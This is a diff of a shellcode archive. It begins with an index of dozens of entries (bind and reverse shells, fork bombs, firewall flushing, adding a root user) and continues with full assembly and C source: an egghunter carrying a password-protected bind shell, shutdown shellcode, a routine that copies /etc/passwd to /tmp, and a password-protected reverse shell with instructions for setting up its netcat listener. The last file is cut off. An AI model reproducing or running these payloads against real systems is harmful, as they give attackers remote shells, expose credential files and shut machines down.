623 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
624 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
625 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
626 41220 shellcodes/generator/41220.c Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator) Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
627 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes) Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
628 41375 shellcodes/linux/41375.c Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes) Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode shellcode linux
629 41381 shellcodes/windows_x86/41381.c Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) 2017-02-17 Ege Balci shellcode windows_x86
630 41398 shellcodes/linux_x86-64/41398.nasm Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2017-02-19 Robert L. Taylor shellcode linux_x86-64
631 41403 shellcodes/linux_x86/41403.c Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) 2017-02-20 lu0xheap shellcode linux_x86
632 41439 shellcodes/linux_x86-64/41439.c Linux/x86-64 - Egghunter Shellcode (38 bytes) 2017-02-23 odzhancode shellcode linux_x86-64
633 41467 shellcodes/windows_x86/41467.c Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode windows_x86
634 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes) Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
635 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes) Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
636 41481 shellcodes/windows_x86/41481.asm Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
637 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
638 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
639 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
640 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
641 41581 shellcodes/windows_x86/41581.c Windows x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
642 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes) Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
643 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve /bin/dash Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
644 43480 shellcodes/alpha/43480.c Alpha - /bin/sh Shellcode (80 bytes) 2009-01-01 Lamont Granquist shellcode alpha
645 43481 shellcodes/alpha/43481.c Alpha - execve() Shellcode (112 bytes) 2009-01-01 anonymous shellcode alpha
646 43482 shellcodes/alpha/43482.c Alpha - setuid() Shellcode (156 bytes) 2009-01-01 anonymous shellcode alpha
647 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
648 43489 shellcodes/linux_x86/43489.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode linux_x86
649 43497 shellcodes/arm/43497.asm Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes) 2018-01-11 Azeria shellcode arm
650 43502 shellcodes/freebsd_x86-64/43502.txt FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) 2009-01-01 Gitsnik shellcode freebsd_x86-64
651 43503 shellcodes/freebsd_x86-64/43503.txt FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) 2009-01-11 Gitsnik shellcode freebsd_x86-64
652 43504 shellcodes/freebsd_x86/43504.asm FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) 2009-01-01 Tosh shellcode freebsd_x86
653 43505 shellcodes/freebsd_x86/43505.c FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) 2009-01-01 antrhacks shellcode freebsd_x86
654 43506 shellcodes/freebsd_x86/43506.c FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes) 2009-01-01 zillion shellcode freebsd_x86
655 43507 shellcodes/freebsd_x86/43507.c FreeBSD - reboot() Shellcode (15 Bytes) 2009-01-01 zillion shellcode freebsd_x86
656 43508 shellcodes/irix/43508.c IRIX - execve(/bin/sh -c) Shellcode (72 bytes) 2009-01-01 anonymous shellcode irix
657 43509 shellcodes/irix/43509.c IRIX - execve(/bin/sh) Shellcode (43 bytes) 2009-01-01 anonymous shellcode irix
658 43510 shellcodes/irix/43510.c IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes) 2009-01-01 scut/teso shellcode irix
659 43511 shellcodes/irix/43511.c IRIX - execve(/bin/sh) Shellcode (68 bytes) 2009-01-01 scut/teso shellcode irix
660 43512 shellcodes/irix/43512.c IRIX - stdin-read Shellcode (40 bytes) 2009-01-01 scut/teso shellcode irix
661 43520 shellcodes/arm/43520.c Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) 2017-03-31 dummys shellcode arm
664 43532 shellcodes/arm/43532.c Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes) 2013-09-04 gunslinger_ shellcode arm
665 43533 shellcodes/arm/43533.c Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes) 2013-09-04 gunslinger_ shellcode arm
666 43534 shellcodes/arm/43534.c Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes) 2010-08-31 Jonathan Salwan shellcode arm
667 43536 shellcodes/arm/43536.c Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes) Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes) 2009-01-01 Neil Klopfenstein shellcode arm
668 43537 shellcodes/arm/43537.c Linux/StrongARM - setuid() Shellcode (20 bytes) 2009-01-01 funkysh shellcode arm
669 43538 shellcodes/arm/43538.c Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes) 2009-01-01 funkysh shellcode arm
670 43539 shellcodes/arm/43539.c Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes) Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes) 2009-01-01 funkysh shellcode arm
671 43545 shellcodes/linux_sparc/43545.c Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes) 2009-01-01 anathema shellcode linux_sparc
672 43541 shellcodes/superh_sh4/43541.c Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) 2011-06-22 Florian Gaultier shellcode superh_sh4
673 43542 shellcodes/superh_sh4/43542.c Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes) Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes) 2009-01-01 Dad_ shellcode superh_sh4
674 43546 shellcodes/linux_sparc/43546.c Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes) 2009-01-01 Michel Kaempf shellcode linux_sparc
675 43549 shellcodes/linux_x86-64/43549.c Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) 2009-01-01 Dad_ shellcode linux_x86-64
676 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
677 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
678 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
679 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
680 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
681 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
682 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
683 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
684 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
685 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
686 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
687 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
688 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
689 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
690 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes) Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
691 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes) Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
692 41750 shellcodes/linux_x86-64/41750.txt Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
693 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve /bin/sh Shellcode (21 bytes) 2017-03-29 WangYihang shellcode linux_x86
694 41827 shellcodes/windows_x86-64/41827.txt Windows 10 x64 - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
695 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
696 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
697 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
698 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes) Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
699 42016 shellcodes/windows/42016.asm Windows x86/x64 - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
700 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
701 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
702 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
703 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
704 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
705 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes) Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
706 42428 shellcodes/linux_x86/42428.c Linux x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
707 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes) Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
708 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
709 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
710 42594 shellcodes/linux_x86/42594.c Linux/x86 - Fork Bomb Shellcode (9 bytes) 2017-08-30 Touhid M.Shaikh shellcode linux_x86
711 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes) Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
712 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
713 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
714 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
715 42992 shellcodes/windows_x86-64/42992.c Windows x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64

98
shellcodes/linux_x86-64/43554.c Normal file
View file

@ -0,0 +1,98 @@
; Author Doreth.Z10
;
; Linux x86_64 Egghunter using sys_access()
; Shellcode size 49 bytes
;
global _start
section .text
_start:
xor rsi, rsi ; Some prep junk.
push rsi
pop rdx
push 8
pop rbx
go_end_of_page:
or dx, 0xfff ; We align with a page size of 0x1000
next_byte:
inc rdx ; next byte offset
push 21
pop rax ; We load access() in RAX
push rdx
pop rdi
add rdi, rbx ; We need to be sure our 8 byte egg check does not span across 2 pages
syscall ; syscall to access()
cmp al, 0xf2 ; Checks for EFAULT. EFAULT indicates bad page access.
jz go_end_of_page ; if EFAULT, try next page
; --
; Put your won egg here !
mov eax, 0xBEBDBEBD ; Egg contruction so we dont catch ourself !
not eax ; Important, EGG must contain NOP like instruction bytecode.
; --
mov rdi, rdx
scasd
jnz next_byte ; if egg does not match, try next byte
cmp eax, [rdi]
jnz next_byte ; if egg does not match, try next byte
jmp rdi ; Good, found egg. Jump !
; Important, EGG must contain NOP like instruction bytecode.
;
; Egghunter demonstration
;
; bindshell is pushed in the heap using a malloc() call and pre-pended with the egg. Then egghunter is fired.
;
; Depending on size of the malloc() call, binshell can be anywhere in the address space.
; For a big malloc() size like 1 000 000 bytes, it will be placed far in the address space.
; A malloc(1000000) was tested on a Unbuntu system with Inter Core i7 and it took over 9 hrs for the egghunter
; to find the egg.
;
; Enjoy.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char egg[] =
"YOUR EGG HERE 4 bytes";
// In this example we use a password protected binshell on port 1337: pAzzW0rd
unsigned char bindshell[] =
"\xeb\x09\x48\x31\xff\x48\xf7\xe7\x57\x5e\xc3\x55\x48\x89\xe5\xe8\xee\xff\xff\xff\x04\x29\x40\x80\xc7\x02\xff\xc6\x0f\x05\x50\xe8\xde\xff\xff\xff\x04\x31\x48\x8b\x3c\x24\x56\x81\xc6\x03\x01\x05\x39\x66\x81\xee\x01\x01\x56\x48\x89\xe6\x80\xc2\x10\x0f\x05\xe8\xbe\xff\xff\xff\x04\x32\x48\x8b\x7d\xf8\x0f\x05\xe8\xb1\xff\xff\xff\x04\x2b\x48\x8b\x7d\xf8\x48\x89\xe6\x80\xc2\x18\x52\x48\x89\xe2\x0f\x05\x49\x89\xc0\xe8\x97\xff\xff\xff\x4c\x89\xc7\x40\x80\xec\x18\x48\x89\xe6\x80\xc2\x18\x0f\x05\x48\xb8\x70\x41\x7a\x7a\x57\x30\x72\x64\x48\x89\xe7\x48\xaf\x75\x42\x48\x31\xc0\x4c\x89\xc7\x48\x31\xf6\x40\x80\xc6\x02\x04\x21\x0f\x05\x48\x31\xc0\x04\x21\x48\xff\xce\x75\xf4\x0f\x05\xe8\x55\xff\xff\xff\x50\x04\x3b\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x50\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x48\x89\xec\x5d\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05";
unsigned char egghunter[] =
"\x48\x31\xf6\x56\x5a\x6a\x08\x5b\x66\x81\xca\xff\x0f\x48\xff\xc2\x6a\x15\x58\x52\x5f\x48\x01\xdf\x0f\x05\x3c\xf2\x74\xea\xb8\xbd\xbe\xbd\xbe\xf7\xd0\x48\x89\xd7\xaf\x75\xe2\x3b\x07\x75\xde\xff\xe7";
main()
{
char *heap = (char*)malloc(1000000);
memset(heap, '\0', 512);
strncpy(heap, egg, 4);
strncpy(heap+4, egg, 4);
strncpy(heap+8, bindshell, 212);
printf("Egghunter Length: %d\n", strlen(egghunter));
printf("Shellcode Length: %d\n", strlen(bindshell));
int (*ret)() = (int(*)())egghunter;
ret();
return 0;
}

64
shellcodes/linux_x86-64/43555.c Normal file
View file

@ -0,0 +1,64 @@
/*
; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
xor rax, rax
xor rdx, rdx
push rax
push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp
push rax
push word 0x682d ;-h
mov rcx, rsp
push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp
push rdx
push rbx
push rcx
push rdi
mov rsi, rsp
add rax, 59
syscall
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\x48\x31\xc0\x48\x31\xd2\x50\x6a"
"\x77\x66\x68\x6e\x6f\x48\x89\xe3"
"\x50\x66\x68\x2d\x68\x48\x89\xe1"
"\x50\x49\xb8\x2f\x73\x62\x69\x6e"
"\x2f\x2f\x2f\x49\xba\x73\x68\x75"
"\x74\x64\x6f\x77\x6e\x41\x52\x41"
"\x50\x48\x89\xe7\x52\x53\x51\x57"
"\x48\x89\xe6\x48\x83\xc0\x3b\x0f"
"\x05";
int
main() {
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}

72
shellcodes/linux_x86-64/43556.asm Normal file
View file

@ -0,0 +1,72 @@
; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimalization was performed on the
; original code which left some space to do a basic decoding of the
; command (/sbin/shutdown). Each byte (except the first one) was
; decremented by 1. The decoder just adds 1 to each byte.
;
; ===================================================================
section .text
global _start
_start:
xor rax, rax ; clear rax and rdx
cdq
; -------------------------------------------------------------------
; 1. store '-h' on stack
; -------------------------------------------------------------------
push rax
push word 0x682d ;-h
push rsp
pop rcx
; -------------------------------------------------------------------
; 2. store 'now' on stack
; -------------------------------------------------------------------
push rax
push byte 0x77
push word 0x6f6e ; now
push rsp
pop rbx
push rax
push rbx
push rcx
; -------------------------------------------------------------------
; 3. store '/sbin/shutdown' on stack
; -------------------------------------------------------------------
push rsp
pop rsi
push rax
jmp shutdown
cont:
pop rdi
push 15
pop rcx
do_add:
add byte [rdi+rcx], 0x01
loop do_add
push 59
pop rax
syscall
shutdown:
call cont
c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d

89
shellcodes/linux_x86-64/43557.asm Normal file
View file

@ -0,0 +1,89 @@
; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-867.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 105 bytes (got shorter by 13 bytes)
;
; What's new is that some optimalization was performed on the
; original code which left some space to do a basic decoding of the
; file names. Each byte (except the first one) was xor'ed with the
; value 0x32. The decoder part xor's each byte (except the first)
; with this very same value.
;
; ===================================================================
section .text
global _start
_start:
xor rsi, rsi
jmp string_1
cont_1:
pop rdi
; decode
push 24
pop rcx
decode:
xor byte [rdi+rcx], 0x32
loop decode
sub byte [rdi+11], 0x41 ; set last byte to 0x00
sub byte [rdi+24], 0x41 ; set last byte to 0x00
; open (1)
push 2
pop rax
syscall
push rax
pop r14 ; source
; open (2)
add rdi, 12
push 0x66
pop rsi
push 2
pop rax
syscall
push rax
pop r15 ; destination
; read
xor rax, rax
push r14
pop rdi
push rsp
pop rsi
mov dx, 0xFFFF
syscall
; write
push rax
pop rdx
push r15
pop rdi
push 1
pop rax
syscall
; exit
push 60
pop rax
syscall
string_1:
call cont_1
; first byte stays the original value
s_1: db 0x2F, 0x57, 0x46, 0x51, 0x1D, 0x42, 0x53, 0x41, 0x41, 0x45, 0x56, 0x73, 0x1D, 0x46, 0x5F, 0x42, 0x1D, 0x5D, 0x47, 0x46, 0x54, 0x5B, 0x5E, 0x57, 0x73

176
shellcodes/linux_x86-64/43558.asm Normal file
View file

@ -0,0 +1,176 @@
; ===================================================================
; Password Protected Reverse Shell
; Author: SLAE64-1351 (Keyman)
; Date: 04/09/2014
;
; Shellcode length: 136 bytes
;
; Description:
;
; Simple reverse shell (listens on port 4444 by default) with
; bytes password protection. Using a 4 bytes long password is
; still reasonably strong for a single-shot connection and keeps
; the code shorter.
;
; To change the port or the password just modify the values of the
; exp_port and exp_pass "variables" below.
;
; Before the code gets executed make sure to create a listener:
;
; nc -lvp <port number>
;
; After you receive the connection you will see no password
; prompt. Just type in the 4 bytes long password and hit enter.
; If the password matches, you are ready to type OS commands.
;
; ===================================================================
global _start
section .text
; -------------------------------------------------------------------
; Preprocessor directives so you can easily change the port and the
; password.
; -------------------------------------------------------------------
; Host to connect to. Please note that this value will have
; 0x02020202 added to it, this way avoiding the NULL bytes.
%define exp_host 0xFEFDFE7D ; 127.0.0.1
; Port number to listen on.
%define exp_port 0x5c11 ; 4444
; Password to use. Make sure it's not longer than 4 bytes.
%define exp_pass 0x6c6c6568 ; hell
; -------------------------------------------------------------------
; DO NOT TOUCH
; preprocessor directives so syscalls can be easily referenced
; -------------------------------------------------------------------
%define sys_connect 42
%define sys_read 0
%define sys_execve 59
%define sys_dup2 33
_start:
; ---------------------------------------------------------------
; START: create socket
; ---------------------------------------------------------------
xor rax, rax
push rax ; saving for sockaddr
push rax ; struct
push rax ; clear rax later
push rax ; set rdx to 0
pop rdx ; protocol
mov al, 2
push rax
push rax
pop rsi
pop rdi ; PF_INET
shr rsi, 1 ; SOCK_STREAM
add al, 39 ; socket syscall (41)
syscall
; ---------------------------------------------------------------
; START: create struct
;
; srv_addr.sin_family = AF_INET;
; srv_addr.sin_addr.s_addr = INADDR_ANY;
; srv_addr.sin_port = htons(portno);
;
; This is how it looks like on the stack:
; 0x02 0x00 0x11 0x5c 0x7f 0x00 0x00 0x01
; 0x20 0x00 0x00 0x00 0x00 0x00 0x00 0x00
; ---------------------------------------------------------------
; TODO: have to make this shorter somehow
mov byte [rsp], 2 ; set values
mov word [rsp+2], exp_port
mov dword [rsp+4], exp_host
add dword [rsp+4], 0x02020202
push rsp
pop rsi ; addr of struct in rsi
; ---------------------------------------------------------------
; START: connect
; ---------------------------------------------------------------
; rdx is still 0
push rax ; socket fd
pop rdi
add dl, 16
mov al, sys_connect
syscall
; ---------------------------------------------------------------
; get passwd
;
; We will work with a 4 byte password, should be more than
; enough as no brute forcing is possible. Chances to guess
; the right value is 0. Of course passwd should not contain
; null bytes.
;
; n = read(newsockfd,buffer,4);
; ---------------------------------------------------------------
push rax ; buffer filled with 0s
push rsp ; setup pointer to buf
pop rsi
sub rdx, 12 ; set bytes to read (4)
syscall
; compare pass received with valid pass and exit if no match
push rax
pop rcx
push rdi ; save socket
pop rax
sub rcx, 3 ; read only once
push rsp
pop rdi
push exp_pass
push rsp
pop rsi
cmpsq
jne passfail ; passwd match, give shell
shell:
; ---------------------------------------------------------------
; 6. exec shell
; ---------------------------------------------------------------
add cl, 2 ; rcx is 1, so add 2 = 3
push rax ; restore socket
pop rdi
dup_loop:
push rcx ; have to save rcx as dup2
; changes it's value
xor rax, rax
sub rcx, 1
push rcx
pop rsi
add al, sys_dup2
syscall
pop rcx ; restore the counter
loop dup_loop
jmp mytext
code:
pop rdi
mov [rdi+7], BYTE al
push rax
pop rdx
add al, sys_execve
syscall
mytext:
call code
MyText: db '/bin/sh', 0x41
passfail:

214
shellcodes/linux_x86-64/43559.asm Normal file
View file

@ -0,0 +1,214 @@
; ===================================================================
; Password Protected Bind Shell
; Author: SLAE64-1351 (Keyman)
; Date: 03/09/2014
;
; Shellcode length: 147 bytes
;
; Description:
;
